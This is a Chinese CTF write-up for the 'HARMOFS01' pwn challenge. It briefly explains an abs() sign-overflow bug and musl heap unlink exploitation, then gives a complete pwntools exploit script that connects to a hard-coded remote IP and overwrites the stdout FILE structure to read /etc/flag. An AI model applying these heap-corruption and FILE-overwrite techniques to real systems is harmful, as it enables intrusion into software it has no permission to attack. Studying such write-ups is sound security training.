HARMOFS01



WriteUp来源

来自Venom战队发布

https://www.xctf.org.cn/library/details/5acdc1c31cf4935ac38fce445978888a5710cf11/

题目描述

简单的文件系统

题目考点

  • abs函数的漏洞

  • musl libc的堆利用

  • ROP

解题思路

abs(-0x80000000) = -0x80000000，从而导致我们可以负数溢出到 size 位，修改 size，可以实现堆溢出；利用 unlink 到 bss 段可以实现任意读写，修改 IO_stdout 调用 orw 函数即可。

from pwn import *
# Debug log level makes pwntools echo every byte sent and received.
context.log_level = 'debug'
# Endpoint hard-coded from the writeup. The connection is opened at module
# import time, so every helper below shares this single global socket.
p = remote("124.70.204.134", 31460)
def touch(name, size):
    """Drive the service's ``touch`` command: create file *name* of *size* bytes.

    Answers the three prompts in the order the remote shell asks them
    (command, size, name) over the module-level connection ``p``.
    *size* is sent as its decimal string.
    """
    dialogue = (
        ("Sh > ", "touch"),
        ("File size: ", str(size)),
        ("File name: ", name),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def read(name, size, note):
    """Run ``fileop`` on *name* with operation code ``"1"`` and push *note* to it.

    The size prompt is answered with *size*; *note* is then written with
    ``p.send`` exactly as given (no newline is appended), so the caller is
    responsible for any terminator. Uses the module-level connection ``p``.
    """
    ask = p.sendlineafter
    ask("Sh > ", "fileop")
    ask("File name: ", name)
    ask("Operation: ", "1")
    ask("Size: ", str(size))
    p.send(note)
def write(name, size):
    """Run ``fileop`` on *name* with operation code ``"2"`` for *size* bytes.

    Nothing is read back here; whatever the service prints afterwards is
    left on the module-level connection ``p`` for the caller to consume.
    """
    dialogue = (
        ("Sh > ", "fileop"),
        ("File name: ", name),
        ("Operation: ", "2"),
        ("Size: ", str(size)),
    )
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def seek1(name, offset):
    """Run ``fileop`` on *name* with operation ``"3"`` in mode ``"1"`` at *offset*.

    *offset* is sent as its decimal string; all prompts are answered over
    the module-level connection ``p``.
    """
    dialogue = [
        ("Sh > ", "fileop"),
        ("File name: ", name),
        ("Operation: ", "3"),
        ("Mode: ", "1"),
        ("Offset: ", str(offset)),
    ]
    for prompt, reply in dialogue:
        p.sendlineafter(prompt, reply)
def seek2(name, offset):
    """Run ``fileop`` on *name* with operation ``"3"`` in mode ``"2"`` at *offset*.

    Identical dialogue to ``seek1`` except for the mode answer; *offset*
    is sent as its decimal string over the module-level connection ``p``.
    """
    ask = p.sendlineafter
    ask("Sh > ", "fileop")
    ask("File name: ", name)
    ask("Operation: ", "3")
    ask("Mode: ", "2")
    ask("Offset: ", str(offset))
def free(name):
    """Run ``fileop`` on *name* with operation code ``"4"``.

    The script's naming treats operation 4 as the delete/free path; only
    the three prompts are answered, over the module-level connection ``p``.
    """
    send = p.sendlineafter
    send("Sh > ", "fileop")
    send("File name: ", name)
    send("Operation: ", "4")
def exp():
    """Run the whole interaction against the module-level connection ``p``.

    Parses the two leaked "Gift" values, performs the file operations in the
    order the writeup describes, logs the derived addresses and finally hands
    the socket to the user with ``p.interactive()``.

    NOTE(review): expressions such as ``p32(...) + '\\n'`` concatenate the
    result of ``p32`` with a ``str`` literal, which assumes Python 2 (or a
    pwntools where ``p32`` returns ``str``) -- confirm before running on
    Python 3, where ``bytes + str`` raises ``TypeError``.
    """
    # The service prints two "Gift: 0x..." lines. Each hex value has a fixed
    # offset subtracted to obtain a base address; the offsets are specific to
    # the challenge's libc and binary builds and come from the writeup.
    p.recvuntil("Gift: 0x")
    libc_base = int(p.recvuntil("\r", drop = True),16)-0x86EB8
    p.recvuntil("Gift: 0x")
    elf_base = int(p.recvuntil("\r", drop = True),16)-0x12d8

    # Eleven 9-byte files. The trailing comments are the author's; they
    # presumably record the low byte of each file's heap address -- verify
    # against the allocator if the layout matters.
    touch("luck", 9)#00
    touch("LUCK", 9)#30
    touch("aaaa", 9)#60
    touch("bbbb", 9)#90
    touch("cccc", 9)#c0
    touch("dddd", 9)#f0
    touch("eeee", 9)#20
    touch("ffff", 9)#50
    touch("gggg", 9)#80
    touch("hhhh", 9)#b0
    touch("iiii", 9)#e0

    # 2147483648 == 0x80000000. The writeup states abs() returns this value
    # unchanged (still negative), so the two seeks move the cursor before the
    # buffer and the 5-byte write lands on the chunk's size field, which is
    # overwritten with 0xffffffff.
    seek1("luck", 2147483648)
    seek1("luck", 2147483644)
    read("luck", 5, p32(0xffffffff)+'\n')

    # With the size enlarged, a 0x200-byte dump of "luck" runs past its own
    # chunk; two neighbours were just freed. The u32 located 12 bytes before
    # the "bbbb" marker is taken as a heap address -- which allocator field
    # that is cannot be told from here.
    free("bbbb")
    free("dddd")
    write("luck", 0x200)
    data = p.recvuntil("bbbb")
    heap_addr = u32(data[-12:-8])

    # Same size-field corruption, now on "aaaa".
    seek1("aaaa", 2147483648)
    seek1("aaaa", 2147483644)
    read("aaaa", 5, p32(0xffffffff)+'\n')

    # Forged chunk header written through "aaaa": 11 bytes of padding, the
    # size pair 0x31/0x30, then two pointers into the binary's data segment
    # (elf_base+0x3034-12 and elf_base+0x303c). Freeing "aaaa" afterwards is
    # the "unlink to bss" step of the writeup; the pointer pair is what that
    # unlink dereferences.
    fake = 'a'*11+p32(0x31)+p32(0x30)+p32(elf_base+0x3034-12)+p32(elf_base+0x303c)+'bbbb\n'
    read("aaaa", len(fake), fake)
    free("aaaa")
    # From here on a file is addressed by the raw bytes of elf_base+0x3034-12
    # (NUL-terminated) instead of a printable name -- NOTE(review): this
    # implies the unlink left that pointer in the name slot; confirm.
    read(p32(elf_base+0x3034-12)+'\x00', 4, p32(libc_base+0x000A40A0)+'\n')
    seek2(p32(elf_base+0x3034-12)+'\x00', heap_addr+0x98)

    # Raw-byte file name (12 bytes plus NUL). Its origin is not visible in
    # this script -- presumably whatever the previous step left as the name.
    io_file = "\xA4\xBF\x43\xF0\xE9\x50\x81\x39\x57\x16\x52\x37\x00"
    seek2(io_file, 5)
    # Same negative-offset trick, 60 bytes further back this time, followed
    # by a 0x12c-byte dump whose output is not parsed.
    seek1(io_file, 2147483648)
    seek1(io_file, 2147483640-60)
    read(io_file, 4, p32(0xffffffff)+'\n')
    write(io_file, 0x12c)
    # Final 0x28-byte payload: "/etc/flag" NUL-padded to 0x24 bytes, then a
    # pointer into the binary (elf_base+0x1248). Per the writeup this
    # overwrites the stdout FILE object so its handler opens, reads and
    # writes the flag.
    fake_file = '/etc/flag\x00'
    fake_file = fake_file.ljust(0x24, '\x00')
    fake_file += p32(elf_base+0x1248)
    read(io_file, 0x28, fake_file)

    log.info("elf_base == > " + hex(elf_base))
    log.info("libc_base == > " + hex(libc_base))
    log.info("heap_addr == > " + hex(heap_addr))
    p.interactive()
# Entry point; note the connection itself is already opened at import time
# by the module-level remote() call above, not here.
if __name__ == '__main__':
    exp()